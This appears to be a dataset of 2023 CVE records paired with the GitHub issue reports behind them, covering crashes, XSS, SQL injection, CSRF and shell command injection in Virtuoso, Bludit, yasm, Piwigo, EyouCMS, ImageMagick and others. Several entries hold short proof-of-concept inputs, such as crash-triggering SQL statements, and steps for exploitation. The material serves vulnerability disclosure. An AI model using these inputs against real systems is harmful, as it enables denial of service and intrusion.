#3 0x76dc84 ... | virtuoso 7.2.9 crashed at sqlo_union_scope | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1139/comments | 0 | 2023-04-12T19:40:20Z | 2023-04-14T08:12:16Z | https://github.com/openlink/virtuoso-opensource/issues/1139 | 1,665,136,195 | 1,139 |
CVE-2023-31630 | 2023-05-15T15:15:12.723 | An issue in the sqlo_query_spec component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1138"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1138 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE mvtest_pdt1 AS (SELECT 1 AS col1) WITH DATA;
```
backtrace:
```c
#0 0x70d571 (sqlo_query_spec+0x41)
#1 0x7da2d4 (sqlc_insert+0x13b4)
#2 0x6b7387 (sql_stmt_comp+0x987)
#3 0x6ba122 (sql_compile_1+0x1a62)
#4 0x68276d (bif_exec+0x67d)
#5 0x74b044 (ins_c... | virtuoso 7.2.9 crashed at sqlo_query_spec | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1138/comments | 0 | 2023-04-12T19:38:44Z | 2023-04-14T08:12:16Z | https://github.com/openlink/virtuoso-opensource/issues/1138 | 1,665,134,343 | 1,138 |
CVE-2023-31631 | 2023-05-15T15:15:12.777 | An issue in the sqlo_preds_contradiction component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1137"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1137 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE VIEW t1(a) AS SELECT 1;
SELECT a, a, a FROM t1 WHERE a IN (1,5) AND a IN (9,8,3025,1000,3969)
ORDER BY a, a DESC;
```
backtrace:
```c
#0 0x6f6462 (sqlo_preds_contradiction+0x442)
#1 0x6fec43 (sqlo_place_table+0xe23)
#2 0x706bab (sqlo_try+0xdb)
#3 0... | virtuoso 7.2.9 crashed at sqlo_preds_contradiction | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1137/comments | 0 | 2023-04-12T19:36:18Z | 2023-04-14T08:12:15Z | https://github.com/openlink/virtuoso-opensource/issues/1137 | 1,665,131,513 | 1,137 |
CVE-2023-31698 | 2023-05-17T13:15:09.463 | Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/bludit/bludit/issues/1212#issuecomment-649514491 | null | github.com | [
"bludit",
"bludit"
] | ### Describe your problem
https://github.com/bludit/bludit/blob/master/bl-kernel/ajax/logo-upload.php
Logo upload only determines the suffix, but not the content, which causes XSS
and the user can inject any javascript and html code in the page
payload
 via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/bludit/bludit/issues/1369#issuecomment-940806199 | null | github.com | [
"bludit",
"bludit"
] | Hi i have identified a security vulnerability in your application. Kindly do let me know if we can discuss this in detail.
| Alert: Vulnerability in bludit | https://api.github.com/repos/bludit/bludit/issues/1369/comments | 6 | 2021-10-08T11:24:40Z | 2021-10-19T07:40:57Z | https://github.com/bludit/bludit/issues/1369 | 1,020,989,213 | 1,369 |
CVE-2023-31698 | 2023-05-17T13:15:09.463 | Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/bludit/bludit/issues/1509 | [
"Exploit"
] | github.com | [
"bludit",
"bludit"
] | **Description:**
I found Stored Cross-site scripting (XSS) vulnerability in your Bludit - Flat-File CMS (v3.14.1) on "General" settings to "Logo" field. When I send malicious code use svg file after then the browser give me result.
**CMS Version:**
v3.14.1
**Affected URL:**
http://127.0.0.1/bludit/admin/settin... | Stored XSS via SVG file Vulnerability on Bludit v3.14.1 | https://api.github.com/repos/bludit/bludit/issues/1509/comments | 2 | 2023-04-14T22:43:13Z | 2023-07-10T21:54:40Z | https://github.com/bludit/bludit/issues/1509 | 1,669,025,725 | 1,509 |
CVE-2023-31723 | 2023-05-17T15:15:08.873 | yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the function expand_mmac_params at /nasm/nasm-pp.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/DaisyPo/fuzzing-vulncollect/blob/main/yasm/SEGV/nasm-pp.c:4008%20in%20expand_mmac_params/README.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue T... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/yasm/yasm/issues/220 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:4008 in expand_mmac_params
## asan info:
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3645333==ERROR: AddressSanitizer: SEGV on unknown address 0x60bcf518f500 (pc 0x562c742f3049 bp 0x7ffc6fb07330 ... | There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:4008 in expand_mmac_params | https://api.github.com/repos/yasm/yasm/issues/220/comments | 1 | 2023-04-17T16:18:19Z | 2024-03-22T11:52:08Z | https://github.com/yasm/yasm/issues/220 | 1,671,545,980 | 220 |
CVE-2023-31724 | 2023-05-17T15:15:08.917 | yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the function do_directive at /nasm/nasm-pp.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/DaisyPo/fuzzing-vulncollect/tree/main/yasm/SEGV/nasm-pp.c:3570%20in%20do_directive"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/yasm/yasm/issues/222 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:3570 in do_directive
## asan info:
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1433063==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55736a1a1cff bp 0x7fff4d5cbf50 sp 0x7ff... | There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:3570 in do_directive | https://api.github.com/repos/yasm/yasm/issues/222/comments | 1 | 2023-04-17T16:48:59Z | 2024-03-22T11:50:46Z | https://github.com/yasm/yasm/issues/222 | 1,671,589,854 | 222 |
CVE-2023-31725 | 2023-05-17T15:15:08.957 | yasm 1.3.0.55.g101bc was discovered to contain a heap-use-after-free via the function expand_mmac_params at yasm/modules/preprocs/nasm/nasm-pp.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/DaisyPo/fuzzing-vulncollect/tree/main/yasm/heap-use-after-free/nasm-pp.c:3878%20in%20expand_mmac_params"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Is... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/yasm/yasm/issues/221 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params
## asan info:
```
==708699==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000012a8 at pc 0x55647c385147 bp 0x7ffe09f5d870 sp 0x7ffe09f5d860
READ of size 8 at 0x60e0000012a8 thread T0
#0 0x556... | There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params | https://api.github.com/repos/yasm/yasm/issues/221/comments | 1 | 2023-04-17T16:39:42Z | 2024-03-22T11:51:42Z | https://github.com/yasm/yasm/issues/221 | 1,671,576,475 | 221 |
CVE-2023-27233 | 2023-05-17T20:15:09.933 | Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/Piwigo/Piwigo/issues/18... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "86097A18-F13B-45AC-B24B-5A879C3A2DE2",
"versionEndExcluding": "13.6.0",
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/Piwigo/Piwigo/issues/1872 | [
"Release Notes"
] | github.com | [
"Piwigo",
"Piwigo"
] | Without entering too much into details there is a possible SQL injection in file `admin/user_list_backend.php`. This file has no reason to be still in Piwigo since version 12 and the new user manager (which relies on `ws.php` as backend). This file must simply be removed. | [13.x] SQL injection on user_list_backend.php | https://api.github.com/repos/Piwigo/Piwigo/issues/1872/comments | 0 | 2023-02-24T08:42:01Z | 2023-02-24T08:42:44Z | https://github.com/Piwigo/Piwigo/issues/1872 | 1,598,184,264 | 1,872 |
CVE-2023-31708 | 2023-05-23T01:15:09.960 | A Cross-Site Request Forgery (CSRF) in EyouCMS v1.6.2 allows attackers to execute arbitrary commands via a supplying a crafted HTML file to the Upload software format function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/41"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/41 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | let's see the operation:
First,we should add the js and html in "Upload software format" .
Second,we clicked the submit,and use Burp suite to Intercept the packet.
<img width="1251" alt="屏幕截图 2023-04-16 170400" src="https://user-images.githubusercontent.com/60973265/232288495-074b92f6-7789-4a20-879d-ef7fd31a3a08.p... | Three csrf vulnerabilities, you can modify Settings, you can delete articles, you can delete users | https://api.github.com/repos/weng-xianhu/eyoucms/issues/41/comments | 0 | 2023-04-16T10:54:52Z | 2024-03-22T06:50:30Z | https://github.com/weng-xianhu/eyoucms/issues/41 | 1,669,861,738 | 41 |
CVE-2023-33359 | 2023-05-23T14:15:09.813 | Piwigo 13.6.0 is vulnerable to Cross Site Request Forgery (CSRF) in the "add tags" function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1908"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B279DE47-F1F5-4BB9-A47B-1C9B73DD9076",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/Piwigo/Piwigo/issues/1908 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"Piwigo",
"Piwigo"
] | This vulnerability lies in the 'add tags' function in the backend.

Try creating a new label here.

//like this

Add the 'user_id' parameter with single quotes

Discovering ... | There is a SQL Injection in the "profile" function of piwigo | https://api.github.com/repos/Piwigo/Piwigo/issues/1911/comments | 0 | 2023-05-04T12:22:34Z | 2023-05-05T08:25:03Z | https://github.com/Piwigo/Piwigo/issues/1911 | 1,695,904,246 | 1,911 |
CVE-2023-34151 | 2023-05-30T22:15:11.000 | A vulnerability was found in ImageMagick. This security flaw ouccers as an undefined behaviors of casting double to size_t in svg, mvg and other coders (recurring bugs of CVE-2022-32546). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-34151"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81FC97E7-D26F-47A4-A0D3-0E957026718D",
"versionEndExcluding": "7.1.1.11",
"versionEndIncluding": null,
"versionS... | https://github.com/ImageMagick/ImageMagick/issues/6341 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
7.1.30-0
### Operating system
Linux
### Operating system, version and so on
Any
### Description
While reviewing historical vulnerabilities, I discovered several similar bugs just like issue #4985 which was later assigned CVE-2022-32546.
The original vulnerability relates ... | Undefined behaviors of casting `double` to `size_t` in svg, mvg and other coders (recurring bugs of CVE-2022-32546) | https://api.github.com/repos/ImageMagick/ImageMagick/issues/6341/comments | 32 | 2023-05-17T11:25:22Z | 2024-05-13T17:50:37Z | https://github.com/ImageMagick/ImageMagick/issues/6341 | 1,713,682,055 | 6,341 |
CVE-2023-34152 | 2023-05-30T22:15:11.070 | A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-34152"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81FC97E7-D26F-47A4-A0D3-0E957026718D",
"versionEndExcluding": "7.1.1.11",
"versionEndIncluding": null,
"versionS... | https://github.com/ImageMagick/ImageMagick/issues/6339 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
6.9.6-4
### Operating system
Linux
### Operating system, version and so on
Any
### Description
While reviewing historical vulnerabilities, I discovered an aribitary code execution vulnerability (shell command injection) in `OpenBlob`, which is actually an incomplete fix to C... | RCE (shell command injection) vulnerability in `OpenBlob` with `--enable-pipes` configured | https://api.github.com/repos/ImageMagick/ImageMagick/issues/6339/comments | 10 | 2023-05-17T09:47:04Z | 2024-07-11T08:49:30Z | https://github.com/ImageMagick/ImageMagick/issues/6339 | 1,713,528,731 | 6,339 |
CVE-2023-34153 | 2023-05-30T22:15:11.143 | A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-34153"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210660"
},
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81FC97E7-D26F-47A4-A0D3-0E957026718D",
"versionEndExcluding": "7.1.1.11",
"versionEndIncluding": null,
"versionS... | https://github.com/ImageMagick/ImageMagick/issues/6338 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
7.1.0-1
### Operating system
Linux
### Operating system, version and so on
Any
### Description
In reviewing historical vulnerabilities in ImageMagick, I discovered a shell command injection vulnerability in encoding/decoding VIDEO files, which very much resembles CVE-2020-29... | Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding. | https://api.github.com/repos/ImageMagick/ImageMagick/issues/6338/comments | 2 | 2023-05-17T08:50:05Z | 2024-01-23T11:25:13Z | https://github.com/ImageMagick/ImageMagick/issues/6338 | 1,713,432,787 | 6,338 |
CVE-2023-2878 | 2023-06-07T15:15:09.377 | Kubernetes secrets-store-csi-driver in versions before 1.3.3 discloses service account tokens in logs.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/kubernetes/kubernetes/issues/118419"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List"
],
"url": "https://groups.google.com/g/kubernetes-security-an... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:secrets-store-csi-driver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FE39B6E7-61B5-482B-953C-BA5441CD85C7",
"versionEndExcluding": "1.3.3",
"versionEndIncluding": null,
... | https://github.com/kubernetes/kubernetes/issues/118419 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"kubernetes",
"kubernetes"
] | A security issue was discovered in [secrets-store-csi-driver](https://github.com/kubernetes-sigs/secrets-store-csi-driver) where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud ... | CVE-2023-2878: secrets-store-csi-driver discloses service account tokens in logs | https://api.github.com/repos/kubernetes/kubernetes/issues/118419/comments | 1 | 2023-06-02T19:03:54Z | 2023-06-02T19:04:34Z | https://github.com/kubernetes/kubernetes/issues/118419 | 1,738,671,677 | 118,419 |
CVE-2023-33557 | 2023-06-09T18:15:09.693 | Fuel CMS v1.5.2 was discovered to contain a SQL injection vulnerability via the id parameter at /controllers/Blocks.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/bcvgh/fuel-cms-sqlinjection/blob/main/README.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url":... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E3A44312-83D2-4421-9A35-3FD048EA578A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/604 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | login required.
fuel/modules/fuel/controllers/Blocks.php
line 64 import_view method starts
Line 70 receives the id parameter of the post request and enters the import method

fuel/modules/fuel/librari... | FUEL CMS 1.5.2 allows SQL Injection via parameter 'id' in fuel/modules/fuel/controllers/Blocks.php | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/604/comments | 2 | 2023-05-12T02:24:19Z | 2023-05-12T15:50:17Z | https://github.com/daylightstudio/FUEL-CMS/issues/604 | 1,706,820,945 | 604 |
CVE-2023-33492 | 2023-06-12T13:15:10.300 | EyouCMS 1.6.2 is vulnerable to Cross Site Scripting (XSS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/42"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/42 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | EyouCMS v1.6.2 has a vulnerability that stores cross-site scripting



at com.f... | Stack overflow error caused by serialization of `Map` with cyclic dependency -- NOT CVE | https://api.github.com/repos/FasterXML/jackson-databind/issues/3972/comments | 76 | 2023-06-09T07:25:44Z | 2023-11-16T01:29:27Z | https://github.com/FasterXML/jackson-databind/issues/3972 | 1,749,290,478 | 3,972 |
CVE-2023-34867 | 2023-06-14T16:15:20.277 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_property_hashmap_create at jerry-core/ecma/base/ecma-property-hashmap.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5084"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5084 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
